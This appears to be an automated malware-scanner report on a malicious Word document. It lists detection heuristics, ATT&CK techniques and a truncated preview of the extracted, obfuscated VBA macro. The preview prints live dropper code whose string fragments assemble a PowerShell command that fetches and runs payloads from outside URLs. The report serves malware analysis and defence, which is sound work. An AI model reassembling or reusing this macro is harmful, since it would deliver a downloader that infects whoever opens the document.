MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The file is a malicious OLE document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA code, which is used to execute commands. This strongly suggests the macro is designed to download and execute a secondary payload. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further supports a dropper or phishing lure functionality.
Heuristics 7
-
ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 77624 bytes |
SHA-256: 59ecadb0c63ee8445184254d084813d6b43a460f59dffa6e29c8dc0abc0ff430 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "KkzGQNQt"
Function ZswXlZfLQE()
On Error Resume Next
DWfaqll = (ZfLkilfBIOW - Rnd(43 * Tan(WpkUzWpv)) / CffDaJjppjFio * Oct(CwUTNzBAa) * DhaOOjRmGn / Oct(AfjHcwLShQ - Chr(250) + 581 - ChrB(ibiXdCbwnCE)) - 389 + zsjRaFOT)
ISRMcazv = (wNUAuSSWSzkH - Rnd(43 * Tan(vIlYjqEOJoco)) / uCrtSLkMPb * Oct(lBiAMKLafj) * qndTcCY / Oct(YrLVXQiZjYXVj - Chr(250) + 581 - ChrB(QniHEBwcCJps)) - 389 + EQzjhobC)
KGsBAmwhC = (dLKnRwzZCCSH) + Mid("j (' . ( xmcPShome[21]+'+'xmcPShomE6VklYmI04ZnWTf", 2, 34)
QoRadbXA = (ArCRnLlzpi - Rnd(43 * Tan(FZzwjqGOKIAUv)) / jPsjlMSwGh * Oct(jGqrqzzTLDat) * ljzAJPAXGuGw / Oct(SEVaISSOAkPXT - Chr(250) + 581 - ChrB(CAjSGVHv)) - 389 + NSnrjMZ)
aFKUjKuJKh = (riGsTiijmO - Rnd(43 * Tan(rLMBplImlHnLMY)) / CGiaiMYE * Oct(skMttKMYuU) * zIwcUIOqRDT / Oct(TIbYALfkSGnIFY - Chr(250) + 581 - ChrB(sbvPRszLu)) - 389 + FGawinVZ)
pqwVCuVYfjZ = (bWkzjcpG - Rnd(43 * Tan(XWczbkXCIHVblB)) / YfdVbIBwXwu * Oct(KCdqwkhpCjkS) * KrqdZjpUK / Oct(DwTipVYEAjz - Chr(250) + 581 - ChrB(ziRXqEMX)) - 389 + vKIRRLVwSFQAb)
BiquMMOmX = (juzhtwlu) + Mid("t5v0YLbU7q+gzU+gzUu7q3PBhuas);Inu7q+u'+'7qvu7q+u7qogzU+gzUu7qgzU+gzU+gzU+gzUu7qk'+'eu7q+u7q-Item(3PBu7q+u7qhuas)u7q+u7q;gzU+gzUbreak;}catu7q+u7qch{wru7q+u7qitu7q+u7q9S6d", 9, 157)
zDJAVmXtFO = (skRlLMOjHsVnX - Rnd(43 * Tan(sVOWoCBWzhPvFF)) / kTRjPjfbpjDC * Oct(qSZViKhc) * QhXpVmjWQH / Oct(zWYDEHON - Chr(250) + 581 - ChrB(ZnlzsjiItNuXJR)) - 389 + kMaLsrT)
SksGcsDs = (pzUYLfdZVpL - Rnd(43 * Tan(vZEARFdME)) / WJiTAivfnoXKZE * Oct(bwTiKhEuqzIM) * GJQAWsdLuriw / Oct(qBWqlzzPpHJ - Chr(250) + 581 - ChrB(tPSOnWrROYd)) - 389 + WohbZhGpjh)
luuqMBV = (judvXwpHbc - Rnd(43 * Tan(MmnFVSs)) / DVBFUpGhMkmc * Oct(wDaWZooiVkQq) * jHYNYCZss / Oct(hoIGQOcXoAQOiM - Chr(250) + 581 - ChrB(vdDDhklPEFzJ)) - 389 + LjDtFEtiQiYPtN)
YLYQUhamqG = (vtLTuVRaw) + Mid("jGfii3NwZ0jNtzGnwZgzU',[sTRinG][cHAr]39) | . NDhB", 19, 27)
rnjLwGEs = (CXAMINRRCGWcc - Rnd(43 * Tan(zGUmjORX)) / TzSXqIATuMYPqn * Oct(jEzHbRzL) * QcalCCT / Oct(iZjPppaICm - Chr(250) + 581 - ChrB(QDvGTLDcRKw)) - 389 + UlOHOiORstzk)
XwPUu = (jrhicDkpbmFV - Rnd(43 * Tan(bARaKwjXSawHV)) / TKOWaNvoRioXpw * Oct(KzmnZqbsJTjYMN) * jXGHQfNPi / Oct(wmjjlmHj - Chr(250) + 581 - ChrB(HbMTwGrRFDu)) - 389 + iaAzRQifPwjIj)
YZAmcSYPYa = (AUWGazaBPisMdb - Rnd(43 * Tan(MZnVkXELoNQK)) / uLXBwqNmr * Oct(nRRrkCYuQRj) * ZlJnYwJh / Oct(KpNHDLrPnOwUz - Chr(250) + 581 - ChrB(DSfUIPTAsjklls)) - 389 + RRcKjdcE)
cKicjOkJaFY = (GutOWzZiX) + Mid("tHfbAfcXu7qgzU+gzU+u7qcugzU+gzU7q+u7qh(u7q+u7q3PBabcu7q+u7qv5EzRaIsjikWWdajzU", 9, 51)
jdPkw = (DsIXjYpkGpW - Rnd(43 * Tan(KAZNIMj)) / NMikTVZDM * Oct(rEnUDwIh) * VAwULcNGhG / Oct(oXYNOqK - Chr(250) + 581 - ChrB(ELzlXvwSQq)) - 389 + aEapOSPrXIFOrw)
IwHbwphBq = (SadBTIXksiE - Rnd(43 * Tan(vhYFnROCOjrFt)) / cIiwpnM * Oct(NBmoiqzPXILZ) * pMsjwPcMijXH / Oct(jOFwtRaLU - Chr(250) + 581 - ChrB(SwnXCzMitU)) - 389 + mwlPsYkWi)
quvtUFIHsBK = (LWOaZNJzQjf - Rnd(43 * Tan(NhJvzwnPwwHoMY)) / mqkkmTzdsEo * Oct(KzIwIRNIm) * iGNBViPOZN / Oct(jWGfztd - Chr(250) + 581 - ChrB(DRrKfcPqz)) - 389 + XzQrQMiXkwTOdi)
pzUXYfVtBC = (WUjZFMok) + Mid("ULnzYbRvYoqF[30]+gijA5QKaEz", 13, 6)
DAFZEkXF = (PjMJlJbPu - Rnd(43 * Tan(XUpahJrZNWAdnA)) / RTjAtpppDDRbOR * Oct(lTzVuRHLijjLJ) * SltLPTqu / Oct(BJiflWPhd - Chr(250) + 581 - ChrB(YlhiRGcK)) - 389 + wQMijhlS)
tubZzhUDPDj = (VKzYVXkBUj - Rnd(43 * Tan(ikjlhsj)) / BNWzjUiiEA * Oct(tiiEXAdjGz) * wwkIGuTUGH / Oct(XEGwKSDr - Chr(250) + 581 - ChrB(jBAnbzfMkDJdY)) - 389 + RYPXOjKjtMk)
PXNLMqzJGEF = (pSCDCkXlHc - Rnd(43 * Tan(nIivwoi)) / wADrRiK * Oct(udfEuppSjO) * bvKALvLL / Oct(PvEJhKoUlakYs - Chr(250) + 581 - ChrB(cHbXJzSQ)) - 389 + kfDGoAsvG)
FwwmvwSa = (QwzwqDwMMm) + Mid("wE2w3WzDszU9SF7iYSwwk7F+u7qcom/tHeVu7gzU+gzUq+u'+'7q/,htt'+'p:/u7qgzU+gzU+u7q/u7q+u7qju7q+u7qestkid'+'du7q+u7qing.com/10ZEqu7q+u'+'7q/rvY.Splu7q
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.